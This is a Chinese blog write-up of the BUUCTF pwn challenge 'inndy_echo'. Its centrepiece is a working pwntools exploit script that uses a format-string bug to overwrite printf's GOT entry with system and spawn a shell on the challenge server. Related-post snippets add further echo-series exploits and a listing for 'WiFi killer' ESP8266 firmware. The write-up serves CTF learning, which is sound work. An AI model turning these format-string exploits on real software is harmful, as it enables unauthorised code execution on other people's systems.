[BUUCTF-pwn]——inndy_echo

最新推荐文章于 2022-09-02 15:00:46 发布
最新推荐文章于 2022-09-02 15:00:46 发布
阅读量656 收藏
点赞数 1
分类专栏: # BUUCTF # 格式化字符串
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Y_peak/article/details/115305977
版权

[BUUCTF-pwn]——inndy_echo

有gets函数但是没有办法栈溢出,不过幸好有格式化字符串漏洞。

在这里插入图片描述
从旁边我们可以找到system的plt以及printf的got表, 将system的plt地址写入printf的got表。然后输入"/bin/sh"就可以了。

在这里插入图片描述
先找找偏移 7

在这里插入图片描述

exploit

from pwn import *
p = remote("node3.buuoj.cn",28268)
#p = process("./echo")
#gdb.attach(p, "b printf")
offest = 7
printf_got = 0x0804A010
sys = 0x08048400
#payload = fmtstr_payload(7, {printf_got:sys})  
#上面那个payload可以,直接用的pwntools提供的一个函数。
#下面是我自己写的,两个都可以。建议大家多用用下面的方法,
#因为64位这个函数,有时因为\x00截断不管用
#多写写也可以训练一下。
payload = "%19$hhn%4c%20$hhn%4c%21$hhn%124c%22$hhn"
payload = payload.ljust(0x30, 'a')
payload += p32(printf_got) + p32(printf_got+2) + p32(printf_got+3) + p32(printf_got+1)
print(payload)
p.sendline(payload)
sleep(0.2)
p.sendline('/bin/sh\x00')
p.interactive()
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
inndy_echo
weixin_46521144的博客
04-01 408
这道题比较简单,一个fmtstr直接丢给你做,没有栈溢出,虽然也没有canary 那就不管了,直接GOThijack 注意到其实函数本身是调用了system函数的,因此可以在plt表中直接找到system函数写入GOT表中 然后之前没注意,还尝试着把libc基址泄露之后把system的地址直接写回EXIT的GOT表中,尝试在发送EXIT之后调用。但是这样会导致不对齐的现象。。。 除此之外本题还学到一个新的内容。我本来以为fmtstr要写的内容必须是严格递增的 所以之前没有尝试去写print
inndy_echo2
z1r0的博客
03-25 720
inndy_echo2 查看保护 64位下的格式化漏洞,泄露出基址,再泄露出libc。改exit为one_gadget,exit退出就会getshell。 pwndbg运行至printf这里看一下stack就可以发现41和43可以拿到两个地址,再算出one_gadget。这里笔者进行格式化漏洞攻击的时候选定的是ljust(16, b'\x00') + exit_addr。exit_addr。刚好exit_addr放在了偏移为8。分开写,两个字节两个字节写。 from pwn import * from
[BUUCTF]PWN——inndy_echo2(PIE+64位fmt)
mcmuyanga的博客
02-01 1721
inndy_echo2 附件 步骤 例行检查,64位程序,开启了nx和pie 本地试运行一下,看看大概的情况,猜测跟echo差不多。 64位ida载入,跟32位echo一样的代码,只是多开了一个PIE 64位的格式化字符串漏洞,它跟32位有挺大区别的,要注意‘00’的截断,不可以像32位那样一步修改到位,它一次只可修改2字节。不清楚的先看这篇文章 首先对于PIE,我们要先想办法泄露程序基址 在执行echo函数时,echo的栈帧的上一个元素存储了函数的返回地址,返回到main中,所以栈中必定有返回地址
buuoj Pwn writeup 171-175
yongbaoii的博客
06-09 385
171 wdb_2018_1st_babyheap add edit 只能编辑三次。 show free 简单的uaf。 我们可以通过unlink来泄露地址,劫持free_hook。 要注意的是它自己写的一个输入函数。 要么就回车截断,要么就输入32个。所以我们在写exp的时候如果是32字节,就不要加回车,如果不够32个字节,就一定要加回车,不然输入是截断不了的。 先通过double free泄露地址,然后把heap_base + 0x10的chunk申请到。并且把heap_base再挂进去。 将h
hackme inndy pwn echo2 writeup
charlie_heng的专栏
12-30 917
这题做了好久。。。但是学到了很多很骚的思路 做完echo1 ,然后看了下echo2,本来以为只是简单的从32位变成64位,但是发现坑贼多。。。。 首先,用checksec看了下,发现开了pie。。。那就不能简单的改got表,还要用格式化字符串漏洞来泄漏出一个指向程序本身的指针 第二,因为是64位系统,所以一个地址是8个字节,但是这里实际只有6个字节是有内容的,有两个字节是00,所以就不能用p...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
echoecho2的wp
一个码农的笔记
11-12 5831
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了rop和rop2这两个题目感觉还不错,我把wp分享出来,方便大家学习 echo的要求是 nc hackme.inndy.tw 7711 Tips: format string vulnerability这个题目提示了是格式化字符串漏洞,所以先了解一下啥是格式化漏洞,参考 http://www.freeb
c语言格式化字符漏洞,格式化字符串漏洞题目练习
weixin_30111277的博客
05-22 956
整合一下最近做的格式化字符串题目的练习,把wp给写一下,方便对总结对这个漏洞的利用套路和技巧。inndy_echo保护和arch[*] '/media/psf/mypwn2/buuctf/inndy_echo/echo'Arch: i386-32-littleRELRO: Partial RELROStack: No canary foundNX: NX enabl...
BUUCTF(pwn)inndy_echo(32位格式化字符串修改got表)
半岛铁盒的博客
04-05 501
这道题为我们提供了 system, 和 循环 过程, 为我们简化了很多步骤 from pwn import* p=remote('node3.buuoj.cn',25331) elf=ELF('./echo') printf_got=elf.got['printf'] sys=0x8048400 payload=fmtstr_payload(7,{printf_got:sys}) p.sendline(payload) p.sendline('bin/sh') p.interactive() 对...
BUUCTF:8月做题记录
qq_46230755的博客
09-02 4296
摸鱼摸鱼
[BUUCTF]PWN——inndy_echo(32位fmt修改got表)
mcmuyanga的博客
02-01 981
inndy_echo 附件 步骤 例行检查,32位程序,开启了nx保护 本地试运行一下,看看大概的情况,已经看到存在格式化字符串漏洞了,而且还是可以一直输入的哪种 32位ida载入 看到程序里存在格式化字符串漏洞,而且有system函数,想到的是将printf@got修改为system@plt,由于一开始system没用执行,所以got表里的地址不对,得用plt表里的。然后传入bin/sh即可 pwntools集成了一个很强的工具,我们可以通过它快速修改对应的值, 命令格式: fmts
[BUUCTF-pwn] inndy_echo3
weixin_52640415的博客
12-07 322
格式化字符串漏洞,这个题整了一会感觉很烦,然后搜了LiuLian 大师傅的exp [Hackme.inndy]echo/echo2/echo3 | LiuLian 感觉还是自己干吧。 程序没开pie这给泄露减轻不少负担,但这个题在main里先用随机数申请内存,然后在hardfmt里给esp赋值,这导致每次运行栈地址并不完全固定。 不固定其实是相对的,在hardfmt里它是不固定的,但是再往前main和libc_start_main_ret这些都是固定的,只要找到ebp再往后就固定了。 int _..
BUUCTF | [INSHack2017]sanity | [INSHack2019]INSAnity | [INSHack2019]Sanity | [INSHack2017]insanity-
pone2233的博客
01-04 1658
[INSHack2017]sanity 签到题 flag{Youre_sane_Good_for_you} [INSHack2019]INSAnity flag{YouRe_Crazy_and_I_Love_it} [INSHack2019]Sanity flag{Welcome} [INSHack2017]insanity flag{Youre_crazy_I_like_it}
buuctf-pwn入门
最新发布
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro权威指南》能够帮助掌握逆向工程工具的使用技巧,这对解决PWN问题非常有帮助[^1]。 #### 实践平台建议 为了更好地练习技能并应用所学知识,在线实践环境不可或缺。BuuOJ是一个专门为CTF爱好者设计的学习与交流社区,其中包含了大量针对不同难度级别的PWN题目供玩家尝试解答[^2]。通过不断做题积累经验,可以逐步提高自己的技术水平。 #### 解决方案流程概述 当面对具体的PWN题目时,通常遵循以下几个步骤来构建解决方案: - **检测保护机制**:利用`checksec`命令查看目标程序启用了哪些安全防护措施; - **静态分析**:借助IDA Pro等反汇编器对二进制文件进行深入剖析,找出潜在漏洞点; - **编写Exploit脚本**:基于发现的安全缺陷精心构造攻击载荷; - **测试验证**:最后一步是在本地环境中反复调试直至成功获取Flag。 ```bash # 使用 checksec 工具检查可执行文件的安全特性 $ checksec ./vuln_program ``` ```python from pwn import * # 连接到远程服务器上的服务端口 conn = remote('example.com', 9999) # 发送恶意输入数据给存在缓冲区溢出漏洞的服务进程 payload = b'A' * offset + pack(address) conn.sendline(payload) # 接收返回的数据包以确认是否获得shell访问权限 response = conn.recv() print(response.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值